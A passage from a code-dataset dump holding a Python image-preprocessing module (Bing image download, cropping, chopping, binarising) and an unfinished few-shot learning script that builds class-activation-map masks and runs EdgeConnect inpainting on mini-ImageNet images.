#\ndef bing_api(query_array, size_threshold, source_type, top, format):\n \"\"\"Returns the decoded json response content\n\n :param query_array: queries for search\n :param source_type: type for search result\n :param top: number of search results\n :param format: format of search result\n\n A lot of this code shamelessly borrowed from: https://xyang.me/using-bing-search-api-in-python/\n \"\"\"\n\n # Bing API key.\n API_KEY = \"INSERT YOUR API KEY\"\n\n for i in query_array:\n # set search url\n query = '%27' + urllib.parse.quote(i) + '%27'\n # web result only base url\n base_url = 'https://api.datamarket.azure.com/Bing/Search/' + source_type\n url = base_url + '?Query=' + query + '&$top=' + str(top) + '&$format=' + format\n\n # create credential for authentication\n user_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36\"\n # create auth object\n auth = HTTPBasicAuth(API_KEY, API_KEY)\n # set headers\n headers = {'User-Agent': user_agent}\n\n # get response from search url\n response_data = requests.get(url, headers=headers, auth=auth)\n # decode json response content\n json_result = response_data.json()\n\n # set the image counter to 0\n image_counter = 0\n # for the results in the json object\n for result in tqdm(range(0, top - 1)):\n # get the width of the image\n try:\n width = int(json_result['d']['results'][result]['Width'])\n except IndexError:\n print('Error with image.')\n continue\n # if width greater than threshold\n if width > size_threshold:\n # download the urls to the image url array\n image_url = json_result['d']['results'][result]['MediaUrl']\n image_counter += 1\n # open the source\n with open('raw-images/' + i + '-' + str(image_counter) + '.jpg', \"wb\") as file:\n # get request\n response = requests.get(image_url)\n # write the file\n file.write(response.content)\n\n\n# bing_api([\"Waldo\"], 1024, 'Image', 50, 'json')\n\n\n# make all the images square and of same size\ndef crop_and_size(input_file_path, output_file_path, dimensions):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in os.listdir(input_file_path):\n if image != '.DS_Store':\n img = Image.open(input_file_path + '/' + image)\n cropped_and_sized = ImageOps.fit(img, dimensions, Image.ANTIALIAS)\n cropped_and_sized.save(output_file_path + '/' + image, 'JPEG')\n\n\n# crop_and_size('raw-images', 'cropped-and-resized', (1024, 1024))\n\n\n# chops the images into smaller images for use\ndef chop(x_div, y_div, input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n counter = 1\n for image in 
tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n img = Image.open(input_file_path + '/' + image)\n (imageWidth, imageHeight) = img.size\n gridx = x_div\n gridy = y_div\n rangex = imageWidth - gridx\n rangey = imageHeight - gridy\n for x in range(0, rangex, 2):\n for y in range(0, rangey, 2):\n bbox = (x, y, x + gridx, y + gridy)\n slice_bit = img.crop(bbox)\n slice_bit.save(output_file_path + '/' + str(counter) + '_' + str(x) + '_' + str(y) + '.jpg',\n optimize=True, bits=6)\n counter += 1\n\n\n# chop(128, 128, 'cropped-and-resized', 'chopped-128')\n\n\n# flips the images horizontally\ndef flip_horizontally(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n counter = 1\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and transpose horizontally\n flipped = Image.open(input_file_path + '/' + image).transpose(Image.FLIP_LEFT_RIGHT)\n # save the image\n flipped.save(output_file_path + '/' + str(counter) + '-flip' + '.jpg', optimize=True, bits=6)\n counter += 1\n\n\n# flip_horizontally('chopped', 'chopped-flipped')\n\n# desaturates the images\ndef desaturate(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and convert to grayscale\n desaturated = Image.open(input_file_path + '/' + image).convert('1')\n # convert back to rgb\n desaturated = desaturated.convert('RGB')\n # save the image\n desaturated.save(output_file_path + '/' + image, optimize=True, bits=6)\n\n\n# desaturate('chopped-64', 'chopped-64-gray')\n\n\n# converts the images to black OR white\ndef black_or_white(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and convert to black or white\n desaturated = Image.open(input_file_path + '/' + image).convert('L')\n bw = np.asarray(desaturated).copy()\n # pixel range is 0...255, 256/2 = 128\n bw[bw < 128] = 0 # Black\n bw[bw >= 128] = 255 # White\n # get the image from the converted array\n imfile = Image.fromarray(bw)\n # convert back to rgb\n imfile = imfile.convert('RGB')\n # save the image\n imfile.save(output_file_path + '/' + image, optimize=True, bits=6)\n\n\n# black_or_white('chopped-128', 'chopped-128-bw')\n\ndef process_img_to_bw(img_location, chop_size):\n img = Image.open(img_location)\n cropped_and_sized = ImageOps.fit(img, (1024,1024), Image.ANTIALIAS)\n original_image = np.asarray( cropped_and_sized, dtype=\"int32\" )\n (imageWidth, imageHeight) = cropped_and_sized.size\n rangex = int(imageWidth / chop_size)\n rangey = int(imageHeight / chop_size)\n images = []\n for x in range(rangex):\n for y in range(rangey):\n bbox = (x * chop_size, y * chop_size, x * chop_size + chop_size, y * chop_size + chop_size)\n slice_bit = cropped_and_sized.crop(bbox)\n bw = np.asarray(slice_bit).copy()\n # pixel range is 0...255, 256/2 = 128\n bw[bw < 128] = 0 # Black\n bw[bw >= 128] = 255 # White\n # get the image from the converted array\n imfile = Image.fromarray(bw)\n # convert back to rgb\n imfile = imfile.convert('RGB')\n # save the image\n images.append(imfile)\n as_list = []\n for img in images:\n asarr = np.asarray( img, 
dtype=\"int32\" )\n as_list.append(list(asarr))\n img.close()\n return np.asarray(as_list), original_image\n\ndef process_img(img_location, chop_size):\n img = Image.open(img_location)\n # cropped_and_sized = ImageOps.fit(img, (1024,1024), Image.ANTIALIAS)\n original_image = np.asarray( img, dtype=\"int32\" )\n (imageWidth, imageHeight) = img.size\n rangex = int(imageWidth / chop_size)\n rangey = int(imageHeight / chop_size)\n images = []\n for x in range(rangex):\n for y in range(rangey):\n bbox = (x * chop_size, y * chop_size, x * chop_size + chop_size, y * chop_size + chop_size)\n slice_bit = img.crop(bbox)\n # save the image\n images.append(slice_bit)\n as_list = []\n for img in images:\n asarr = np.asarray( img, dtype=\"int32\" )\n as_list.append(list(asarr))\n img.close()\n return np.asarray(as_list), original_image, (imageWidth, imageHeight)\n","sub_path":"tyler/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":9501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"125945509","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport os\nimport sys\nimport time\nfrom PIL import Image\nimport datetime\nimport argparse\nimport os.path as osp\nimport numpy as np\nimport random\nimport cv2\nfrom scipy.misc import imread\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom torch.optim import lr_scheduler\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as Funljj\nsys.path.append('./torchFewShot')\n\n#from args_tiered import argument_parser\nfrom args_xent import argument_parser\n#from torchFewShot.models.net import Model\n\nfrom torchFewShot.models.models_gnn import create_models\nfrom torchFewShot.data_manager_imageori import DataManager\n#from torchFewShot.data_manager import DataManager\nfrom torchFewShot.losses import CrossEntropyLoss\nfrom torchFewShot.optimizers import init_optimizer\nimport transforms as T\nfrom torchFewShot.utils.iotools import save_checkpoint, check_isfile\nfrom torchFewShot.utils.avgmeter import AverageMeter\nfrom torchFewShot.utils.logger import Logger\nfrom torchFewShot.utils.torchtools import one_hot, adjust_learning_rate\n\nsys.path.append('/home/lijunjie/edge-connect-master')\nfrom shutil import copyfile\nfrom src.config import Config\nfrom src.edge_connect_few_shot import EdgeConnect\n\n#config = load_config(mode)\nconfig_path = os.path.join('/home/lijunjie/edge-connect-master/checkpoints/places2_authormodel', 'config.yml')\nconfig = Config(config_path)\nconfig.TEST_FLIST = '/home/lijunjie/edge-connect-master/examples/test_result/'\nconfig.TEST_MASK_FLIST = '/home/lijunjie/edge-connect-master/examples/places2/masks'\nconfig.RESULTS = './checkpoints/EC_test'\nconfig.MODE = 2\nif config.MODE == 2:\n config.MODEL = 3\n config.INPUT_SIZE = 0\n config.mask_id=2\n #if args.input is not None:\n #config.TEST_FLIST = args.input\n\n #if args.mask is not None:\n #config.TEST_MASK_FLIST = args.mask\n\n #if args.edge is not None:\n #config.TEST_EDGE_FLIST = args.edge\n\n #if args.output is not None:\n #config.RESULTS = args.output\n#exit(0)\n\n\nparser = argument_parser()\nargs = parser.parse_args()\n#print(args.use_similarity)\n#exit(0)\nif args.use_similarity:\n from torchFewShot.models.net_similary import Model\nelse:\n from torchFewShot.models.net import 
Model_mltizhixin , Model_tradi\n #print('enter ori net')\n #exit(0)\n \nonly_test=False\ndef returnCAM(feature_conv, weight_softmax, class_idx,output_cam ):\n # generate the class activation maps upsample to 256x256\n size_upsample = (84, 84)\n nc, h, w = feature_conv.shape\n #output_cam = []\n #print(class_idx)\n #exit(0)\n #print(class_idx, nc, h, w,weight_softmax[class_idx[0]].shape)\n #print(feature_conv.shape)\n #print(class_idx)\n #exit(0)\n cam_imgs_resize=[]\n for idx in class_idx[0]:\n #idx=int(idx)\n #print(idx)\n #exit(0)\n #print( weight_softmax[idx].shape,feature_conv.reshape((nc, h*w)).shape)\n #exit(0)\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n #cam_img = np.uint8((255 * cam_img)>200)*255\n cam_img = np.uint8(255 * cam_img)\n cam_img_resize=cv2.resize(cam_img, size_upsample)\n cam_img_resize = np.uint8((cam_img_resize)>200)*255\n #cv2.imwrite('./mask.jpg',cam_img*255)\n #exit(0)\n #print(cam_img.sum())\n #exit(0)\n #cam_img = np.uint8(255 * cam_img)\n mask_tensor=Funljj.to_tensor(Image.fromarray(cam_img_resize)).float()\n #print(mask_tensor.sum()) \n #exit(0) \n output_cam.append(mask_tensor)\n cam_imgs_resize.append(cam_img_resize)\n return output_cam,cam_imgs_resize\ndef main():\n #os.system('cp ./train_with_inpaint_read_from_data.py ' +args.save_dir + 'train_with_inpaint_read_from_data.py')\n ##os.system('cp ./net/network_ori.py '+config.tensorboard_folder + 'network_ori.py.backup') \n #os.system('cp ./net/network_test.py '+config.tensorboard_folder + 'network_test.py.backup') \n torch.manual_seed(args.seed)\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_devices\n use_gpu = torch.cuda.is_available()\n config.DEVICE = torch.device(\"cuda\")\n torch.backends.cudnn.benchmark = True \n #torch.manual_seed(config.SEED)\n \n #torch.cuda.manual_seed_all(config.SEED)\n np.random.seed(args.seed)\n random.seed(args.seed)\n sys.stdout = Logger(osp.join(args.save_dir, 'log_train.txt'))\n print(\"==========\\nArgs:{}\\n==========\".format(args))\n\n if use_gpu:\n print(\"Currently using GPU {}\".format(args.gpu_devices))\n cudnn.benchmark = True\n torch.cuda.manual_seed_all(args.seed)\n else:\n print(\"Currently using CPU (GPU is highly recommended)\")\n \n print('Initializing image data manager')\n dm = DataManager(args, use_gpu)\n trainloader, testloader = dm.return_dataloaders()\n model_edge = EdgeConnect(config)\n model_edge.load() \n print('\\nstart testing...\\n')\n #model_edge.test()\n #print(args.scale_cls,args.num_classes)\n #exit(0)\n #GNN_model=create_models(args,512)\n #print(args.use_similarity)\n #exit(0)\n if args.use_similarity:\n GNN_model=create_models(args,512) \n model = Model(args,GNN_model,scale_cls=args.scale_cls, num_classes=args.num_classes)\n else:\n model = Model_mltizhixin(scale_cls=args.scale_cls, num_classes=args.num_classes)\n model_tradclass = Model_tradi(scale_cls=args.scale_cls, num_classes=args.num_classes)\n params_tradclass = torch.load('result/%s/CAM/1-shot-seed112_classic_classifier_avg_nouse_CAN/%s' % (args.dataset, 'best_model.pth.tar')) \n model_tradclass.load_state_dict(params_tradclass['state_dict']) \n #params = torch.load('result/%s/CAM/1-shot-seed112_inpaint_use_CAM/%s' % (args.dataset, 'checkpoint_inpaint67.pth.tar')) \n #model.load_state_dict(params['state_dict']) \n #print('enter model_tradclass')\n #exit(0)\n if False:\n params = torch.load('result/%s/CAM/1-shot-seed112/%s' % (args.dataset, 'best_model.pth.tar'))\n 
params_tradclass = torch.load('result/%s/CAM/1-shot-seed112_classic_classifier_global_avg/%s' % (args.dataset, 'checkpoint_inpaint67.pth.tar')) \n print(type(params))\n #exit(0)\n #for key in params.keys():\n #print(type(key))\n #exit(0)\n #model.load_state_dict(params['state_dict'])\n model_tradclass.load_state_dict(params_tradclass['state_dict']) \n #exit(0)\n #for ind,i in model.state_dict().items():\n #print (ind,i.shape)\n #exit(0)\n params = list(model_tradclass.parameters()) \n #fc_params=params[-2]\n weight_softmax = np.squeeze(params[-2].data.numpy())\n #print(weight_softmax.shape,type(params[-2]),params[-2].shape,params[-2].data.shape)\n #exit(0)\n criterion = CrossEntropyLoss()\n optimizer = init_optimizer(args.optim, model.parameters(), args.lr, args.weight_decay)\n #optimizer_tradclass = init_optimizer(args.optim, model_tradclass.parameters(), args.lr, args.weight_decay) \n #model_tradclass\n\n if use_gpu:\n model = model.cuda()\n model_tradclass = model_tradclass.cuda() \n\n start_time = time.time()\n train_time = 0\n best_acc = -np.inf\n best_epoch = 0\n print(\"==> Start training\")\n\n for epoch in range(args.max_epoch):\n if not args.Classic:\n learning_rate = adjust_learning_rate(optimizer, epoch, args.LUT_lr)\n else:\n optimizer_tradclass = init_optimizer(args.optim, model_tradclass.parameters(), args.lr, args.weight_decay)\n learning_rate = adjust_learning_rate(optimizer_tradclass, epoch, args.LUT_lr) \n #print('enter optimizer_tradclass')\n #exit(0)\n\n start_train_time = time.time()\n #exit(0)\n #print(not True)\n #exit(0)\n if not only_test:\n #print(';;;;;;;;;;;')\n #exit(0)\n if not args.Classic:\n print('enter train code')\n train(epoch,model_edge, model, model_tradclass,weight_softmax, criterion, optimizer, trainloader, learning_rate, use_gpu)\n #print('oooo')\n else:\n acc=train(epoch,model_edge, model_tradclass, criterion, optimizer_tradclass, trainloader, learning_rate, use_gpu)\n \n train_time += round(time.time() - start_train_time)\n \n if epoch == 0 or epoch > (args.stepsize[0]-1) or (epoch + 1) % 10 == 0:\n print('enter test code')\n #exit(0)\n if not args.Classic:\n #acc = test(model_edge, model, model_tradclass,weight_softmax, testloader, use_gpu)\n acc = test_ori(model, testloader, use_gpu)\n is_best = acc > best_acc\n #else:\n \n \n #print(acc)\n #exit(0)\n if is_best:\n best_acc = acc\n best_epoch = epoch + 1\n if not only_test:\n if not args.Classic:\n save_checkpoint({\n 'state_dict': model.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }, is_best, osp.join(args.save_dir, 'checkpoint_inpaint' + str(epoch + 1) + '.pth.tar'))\n if args.Classic: \n save_checkpoint({\n 'state_dict': model_tradclass.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }, is_best, osp.join(args.save_dir, 'checkpoint_classic' + str(epoch + 1) + '.pth.tar')) \n\n print(\"==> Test 5-way Best accuracy {:.2%}, achieved at epoch {}\".format(best_acc, best_epoch))\n\n elapsed = round(time.time() - start_time)\n elapsed = str(datetime.timedelta(seconds=elapsed))\n train_time = str(datetime.timedelta(seconds=train_time))\n print(\"Finished. Total elapsed time (h:m:s): {}. 
Training time (h:m:s): {}.\".format(elapsed, train_time))\n print(\"==========\\nArgs:{}\\n==========\".format(args))\n\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\ndef load_edge( img, mask):\n sigma = 2\n index=1\n # in test mode images are masked (with masked regions),\n # using 'mask' parameter prevents canny to detect edges for the masked regions\n mask = None if False else (1 - mask / 255).astype(np.bool)\n #mask =(1 - mask / 255).astype(np.bool)\n # canny\n if True:\n # no edge\n if sigma == -1:\n return np.zeros(img.shape).astype(np.float)\n\n # random sigma\n if sigma == 0:\n sigma = random.randint(1, 4)\n\n return canny(img, sigma=sigma, mask=mask).astype(np.float)\n\n # external\n else:\n imgh, imgw = img.shape[0:2]\n edge = imread(self.edge_data[index])\n edge = self.resize(edge, imgh, imgw)\n\n # non-max suppression\n if self.nms == 1:\n edge = edge * canny(img, sigma=sigma, mask=mask)\n\n return edge\n \n \ndef read_image(img_path):\n \"\"\"Keep reading image until succeed.\n This can avoid IOError incurred by heavy IO process.\"\"\"\n got_img = False\n if not osp.exists(img_path):\n raise IOError(\"{} does not exist\".format(img_path))\n while not got_img:\n try:\n img = Image.open(img_path).convert('RGB')\n got_img = True\n except IOError:\n print(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n pass\n return img \ntransform_test = T.Compose([\n T.Resize((args.height, args.width), interpolation=3),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]) \ndef train(epoch,model_edge, model, model_tradclass,weight_softmax, criterion, optimizer, trainloader, learning_rate, use_gpu):\n \n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_1\"):\n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_1\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_2\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_2\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_3\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_3\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_4\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_4\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_full\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_full\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/train_full\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/train_full\") \n losses = AverageMeter()\n batch_time = AverageMeter()\n data_time = AverageMeter()\n std=np.expand_dims(np.array([0.229, 0.224, 0.225]),axis=1)\n std=np.expand_dims(std,axis=2) \n mean=np.expand_dims(np.array([0.485, 0.456, 0.406]),axis=1) \n mean=np.expand_dims(mean,axis=2) \n model.eval()\n #model_edge.eval()\n model_tradclass.eval()\n end = time.time()\n #print('llllllllllllll','located in train_with_inpaint_final.py at 264')\n #exit(0)\n for root, dirs, _ in os.walk('/data4/lijunjie/mini-imagenet-tools/processed_images/train'):\n #for f in files:\n #print(os.path.join(root, f))\n\n for d in dirs:\n path=os.path.join(root, d)\n path_1=path.replace('train','mask/train_1')\n path_2=path.replace('train','mask/train_2')\n 
path_3=path.replace('train','mask/train_3')\n path_4=path.replace('train','mask/train_4')\n path_5=path.replace('train','mask/train_full') \n path_6=path.replace('train','train_full') \n if not os.path.isdir(path_1): \n os.mkdir(path_1)\n os.mkdir(path_2)\n os.mkdir(path_3)\n os.mkdir(path_4)\n os.mkdir(path_5)\n os.mkdir(path_6) \n files = os.listdir(path) \n #images=[]\n #imgs_gray=[]\n #Xt_img_ori=[]\n Paths=[]\n Paths.append(path_1)\n Paths.append(path_2)\n Paths.append(path_3)\n Paths.append(path_4) \n Paths.append(path_5)\n Paths.append(path_6) \n for file in files:\n images=[]\n imgs_gray=[]\n Xt_img_ori=[] \n img_ori = read_image(os.path.join(path, file))\n #print(file)\n #exit(0)\n masked_img=np.array(img_ori)#*(1-mask_3)+mask_3*255\n masked_img=Image.fromarray(masked_img)\n masked_img_tensor=Funljj.to_tensor(masked_img).float() \n Xt_img_ori.append(masked_img_tensor)\n img = transform_test(img_ori)\n img_gray = rgb2gray(np.array(img_ori))\n img_gray=Image.fromarray(img_gray)\n img_gray_tensor=Funljj.to_tensor(img_gray).float() \n imgs_gray.append(img_gray_tensor) \n images.append(img)\n images = torch.stack(images, dim=0)\n imgs_gray = torch.stack(imgs_gray, dim=0) \n Xt_img_ori = torch.stack(Xt_img_ori, dim=0)\n if use_gpu:\n images_train = images.cuda()\n imgs_gray = imgs_gray.cuda()\n Xt_img_ori = Xt_img_ori.cuda()\n \n with torch.no_grad():\n ytest,feature= model_tradclass(images_train.reshape(1,1,3,84,84), images_train.reshape(1,1,3,84,84),images_train.reshape(1,1,3,84,84), images_train.reshape(1,1,3,84,84)) \n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n edges=[]\n mask_fuse=0\n #output_cam=[]\n for i in range(feature.shape[0]):\n CAMs,masks_cpu=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n #for j in range(4):\n #print(CAMs[j].shape,CAMs[j].max(),CAMs[j].min(),CAMs[j].sum(),feature.shape[0])\n #exit(0)\n masks=CAMs\n for num_mask in range(len(masks_cpu)):\n print(len(masks_cpu))\n #exit(0)\n cv2.imwrite(Paths[num_mask]+'/'+file, masks_cpu[num_mask])\n mask_fuse=masks_cpu[0]/255+masks_cpu[1]/255+masks_cpu[2]/255+masks_cpu[3]/255\n mask_fuse=np.uint8((mask_fuse)>0)*255 \n cv2.imwrite(Paths[4]+'/'+file, mask_fuse)\n #exit(0)\n \n #print(len(masks),masks[0].shape)\n # masks_tensor = torch.stack(masks, dim=0) \n masks_tensor=Funljj.to_tensor(Image.fromarray(mask_fuse)).float().reshape(1,1,84,84)\n #print(mask_tensor.shape)\n #exit(0)\n Xt_masks = masks_tensor.reshape(1,1,1,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(1,1,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,1,1,1,1) \n Xt_img_gray_repeat=imgs_gray.reshape(1,1,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,1,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n print(mask_numpy.shape)\n #exit(0)\n Xt_img_gray_numpy=np.uint8(imgs_gray.cpu().numpy()*255).reshape(1,1,1,84,84)\n #print(Xt_img_gray_numpy.shape)\n for i in range(1):\n for j in range(1):\n for k in range(1):\n edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], mask_numpy[i,j,k,0]))\n print(mask_numpy[i,j,k,0].sum()/255,'llll')\n #exit(0)\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n 
#print(edge_sh.shape,Xt_img_gray_repeat.shape,masks_tensor.shape)\n #exit(0)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n with torch.no_grad():\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(1,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(1,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n Xt_img_ori_np=Xt_img_ori_repeat.detach().cpu().numpy() \n #print(inpaint_img_np.shape)\n for id in range(1):\n images_temp_train1=inpaint_img_np[id,:,:]\n Xt_img_ori_repeat1=Xt_img_ori_np.reshape(-1,3,84,84)[id,:,:]\n #print(Xt_img_ori_repeat1.shape)\n #images_temp_train=images_temp_train1*std+mean\n images_ori_train=images_temp_train1.transpose((1,2,0))[:,:,::-1]\n Xt_img_ori_repeat1=Xt_img_ori_repeat1.transpose((1,2,0))[:,:,::-1]\n images_ori_train=np.uint8(images_ori_train*255) \n Xt_img_ori_repeat1=np.uint8(Xt_img_ori_repeat1*255) \n cv2.imwrite(Paths[5]+'/'+file, images_ori_train) \n #cv2.imwrite('./result/inpaint_img/'+str(i)+'_'+str(id)+'_ori.jpg', Xt_img_ori_repeat1) \n exit(0) \n #exit(0) \n #print(path)\n #print(path_1)\n #print(path_2)\n #print(path_3)\n #print(path_4) \n #exit(0) \n for batch_idx, (images_train, labels_train,tpids,Xt_img_ori,Xt_img_gray,images_test, labels_test, pids) in enumerate(trainloader):\n \n #for batch_idx, (images_train, labels_train, images_test, labels_test, pids) in enumerate(trainloader): \n data_time.update(time.time() - end)\n #print(Xt_img_ori.shape,Xt_img_gray.shape,images_train.shape,'lll')\n edges=[]\n if use_gpu:\n images_train = images_train.cuda()\n\n batch_size, num_train_examples, channels, height, width = images_train.size()\n num_test_examples = images_test.size(1)\n \n labels_train_1hot = one_hot(labels_train).cuda()\n labels_train_1hot_4 = one_hot(labels_train_4).cuda() \n #labels_train = labels_train.view(batch_size * num_train_examples) \n #print( labels_train)\n #exit(0) \n labels_test_1hot = one_hot(labels_test).cuda()\n labels_test_1hot_4 = one_hot(labels_test_4).cuda()\n #print(labels_test_1hot_4.shape,labels_test_1hot.shape) \n #labels_test_1hot_4 = torch.cat((labels_test_1hot , labels_test_1hot_4), 1)\n #print(labels_test_1hot.shape,labels_test_1hot_4.shape)\n #exit(0)\n with torch.no_grad():\n ytest,feature= model_tradclass(images_train, images_train, labels_train_1hot, labels_test_1hot)\n #print(ytest.shape)\n #exit(0)\n images_train=images_train.reshape(4,5,1,3,84,84)\n #images_test=images_test.reshape(4,30,1,3,84,84) \n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n #output_cam=[]\n for i in range(feature.shape[0]):\n CAMs=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n masks=CAMs\n #print(len(masks),masks[0].shape)\n masks_tensor = torch.stack(masks, dim=0)\n Xt_masks = masks_tensor.reshape(1,1,4,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(1,1,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,4,1,1,1) \n Xt_img_gray_repeat=Xt_img_gray.reshape(1,1,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,4,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n #print(mask_numpy.shape,Xt_img_gray_numpy.shape)\n Xt_img_gray_numpy=np.uint8(Xt_img_gray.numpy()*255)\n #print(Xt_img_gray_numpy.shape)\n for i in range(1):\n for j in range(1):\n for k in range(4):\n 
edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], mask_numpy[i,j,k,0]))\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n with torch.no_grad():\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(4,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(4,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n for i in range(4):\n images_temp_train1=inpaint_img_np[i,:,:].cpu().numpy()\n #images_temp_train=images_temp_train1*std+mean\n images_ori_train=images_temp_train1.transpose((1,2,0))[:,:,::-1]\n images_ori_train=np.uint8(images_ori_train*255) \n cv2.imwrite('./result/inpaint_img/'+str(i)+'_'+str(j)+'_'+str(labels_train_ex[i,j])+'.jpg', images_ori_train) \n exit(0)\n inpaint_img_np=(inpaint_img_np-mean)/std\n #support set\n inpaint_tensor=torch.from_numpy(inpaint_img_np).cuda().reshape(4,5,4,3,84,84).float() \n #images_train=torch.cat((images_train, inpaint_tensor), 2).reshape(4,25,3,84,84)#images_train\ndef test(model_edge, model, model_tradclass,weight_softmax, testloader, use_gpu):\n accs = AverageMeter()\n test_accuracies = []\n std=np.expand_dims(np.array([0.229, 0.224, 0.225]),axis=1)\n std=np.expand_dims(std,axis=2) \n mean=np.expand_dims(np.array([0.485, 0.456, 0.406]),axis=1) \n mean=np.expand_dims(mean,axis=2) \n model.eval()\n model_tradclass.eval()\n with torch.no_grad():\n for batch_idx , (images_train, labels_train,Xt_img_ori,Xt_img_gray, images_test, labels_test) in enumerate(testloader):\n if use_gpu:\n images_train = images_train.cuda()\n images_test = images_test.cuda()\n\n end = time.time()\n #print(images_train.shape,images_test.shape)\n #exit(0)\n batch_size, num_train_examples, channels, height, width = images_train.size()\n num_test_examples = images_test.size(1)\n labels_train_4 = labels_train.reshape(4,5,1)#[:,:,0]\n\n labels_train_4 = labels_train_4.repeat(1,1,5).reshape(4,-1) \n labels_train_4=labels_train_4.cuda() \n labels_train_1hot = one_hot(labels_train).cuda()\n labels_test_1hot = one_hot(labels_test).cuda()\n labels_train_1hot_4 = one_hot(labels_train_4).cuda() \n ytest,feature= model_tradclass(images_train, images_train, labels_train_1hot, labels_test_1hot)\n #print(ytest.shape)\n #exit(0)\n images_train=images_train.reshape(4,5,1,3,84,84)\n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n #output_cam=[]\n for i in range(feature.shape[0]):\n 